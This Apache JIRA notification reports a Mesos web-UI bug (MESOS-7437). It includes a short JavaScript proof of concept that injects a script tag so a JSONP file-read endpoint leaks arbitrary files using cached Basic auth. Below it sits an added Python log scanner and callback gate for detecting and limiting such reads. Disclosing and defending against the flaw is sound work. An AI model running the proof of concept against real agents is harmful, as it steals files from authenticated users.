[ https://issues.apache.org/jira/browse/MESOS-7437?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Gavin updated MESOS-7437:
-------------------------
    Comment: was deleted

(was: www.rtat.net)

> cross domain file-theft in the web-ui
> -------------------------------------
>
>                 Key: MESOS-7437
>                 URL: https://issues.apache.org/jira/browse/MESOS-7437
>             Project: Mesos
>          Issue Type: Bug
>          Components: security, webui
>            Reporter: Jacob Janco
>            Assignee: Jacob Janco
>            Priority: Major
>
> {code:javascript}
> x=document.createElement('script')
> x.src='http://$AGENT_URI/files/read?path=$PATH_TO_FILE&offset=0&length=50000&jsonp=console.log&_=1490306716903'
> document.body.appendChild(x)
> {code}
> The above code pasted into the web console on http://example.com/, for 
> example, will yield the contents of the requested file. Basic auth is cached 
> and resent in browser tabs/windows as long as the user has authenticated 
> during the browser session. 
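The report above shows why a JSONP callback on an authenticated file endpoint is dangerous: a `<script>` tag on any origin can load it, the browser attaches the cached Basic credentials, and the response runs as script in the attacker's page. The following is an added example, not code from the Mesos project or from the reporter, showing what a defender can do with that knowledge: a scanner over agent access log lines that flags `/files/read` requests carrying a `jsonp` parameter whose Referer is not the agent's own UI, and a server-side gate that refuses to honour the callback unless the browser proves the request is same-origin. The origin `http://agent.example.internal:5051`, the log lines and the header dictionaries are all constructed for this example; the Apache combined log format is assumed.

```python
"""Detection and mitigation helpers for JSONP-based cross-origin reads.

Added example, not Mesos project code. Assumes requests are logged in
Apache combined log format and that the agent's own web UI is served
from AGENT_ORIGIN (a constructed value).
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Hypothetical origin of the agent's own web UI (constructed for this example).
AGENT_ORIGIN = "http://agent.example.internal:5051"

# Combined log format:
#   ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines: one legitimate UI read, one <script>-style
# cross-origin read, one plain JSON read, one JSONP read with no Referer.
SAMPLE_LOG = [
    '10.0.0.5 - alice [24/Mar/2017:10:05:16 +0000] "GET /files/read?path=/var/log/mesos/stderr'
    '&offset=0&length=50000&jsonp=angular.callbacks._0 HTTP/1.1" 200 4120 '
    '"http://agent.example.internal:5051/" "Mozilla/5.0"',
    '203.0.113.9 - alice [24/Mar/2017:10:07:02 +0000] "GET /files/read?path=/var/log/mesos/mesos-agent.INFO'
    '&offset=0&length=50000&jsonp=console.log&_=1490306716903 HTTP/1.1" 200 983 '
    '"http://example.com/" "Mozilla/5.0"',
    '10.0.0.5 - alice [24/Mar/2017:10:08:40 +0000] "GET /files/read?path=/var/log/mesos/stdout'
    '&offset=0&length=1000 HTTP/1.1" 200 500 "-" "curl/7.52"',
    '198.51.100.2 - bob [24/Mar/2017:10:09:01 +0000] "GET /files/read?path=/var/log/mesos/stderr'
    '&jsonp=cb HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]


def same_origin(url: str, origin: str) -> bool:
    """True when url's scheme://host[:port] equals origin; an absent or
    '-' value counts as cross-origin because it proves nothing."""
    if not url or url == "-":
        return False
    u = urlsplit(url)
    return f"{u.scheme}://{u.netloc}".lower() == origin.lower()


def is_cross_origin_jsonp_read(line: str, origin: str = AGENT_ORIGIN) -> Optional[dict]:
    """Return a finding dict for a /files/read request that asked for a JSONP
    callback without a same-origin Referer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if target.path != "/files/read":
        return None
    query = parse_qs(target.query)
    if "jsonp" not in query:
        return None            # plain JSON cannot be read by a <script> tag
    if same_origin(m["referer"], origin):
        return None            # the agent's own UI legitimately uses JSONP
    return {
        "ip": m["ip"],
        "user": m["user"],
        "path": query.get("path", [""])[0],
        "callback": query["jsonp"][0],
        "referer": m["referer"],
        "status": int(m["status"]),
    }


def scan(lines, origin: str = AGENT_ORIGIN) -> list:
    """Run the check over a sequence of log lines and collect the findings."""
    return [hit for hit in (is_cross_origin_jsonp_read(l, origin) for l in lines) if hit]


def jsonp_callback_allowed(headers: dict, origin: str = AGENT_ORIGIN) -> bool:
    """Hypothetical server-side gate (not the Mesos code): honour a ?jsonp=
    callback only when the browser proves the request came from our own UI.
    Sec-Fetch-Site is authoritative where the browser sends it; otherwise
    fall back to Origin/Referer. Removing JSONP entirely is the stronger fix."""
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is not None:
        return site == "same-origin"
    return same_origin(h.get("origin") or h.get("referer", ""), origin)


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"possible cross-origin JSONP read: {hit}")
```

The scanner treats a missing Referer as suspicious rather than benign, because the attack page can suppress it with a referrer policy; the cost is some noise from non-browser clients, which is why the finding keeps the user agent and status for triage. The gate is defence in depth only: a same-origin check narrows who can trigger the callback, but dropping the JSONP parameter from authenticated endpoints is what removes the vulnerability class.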



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)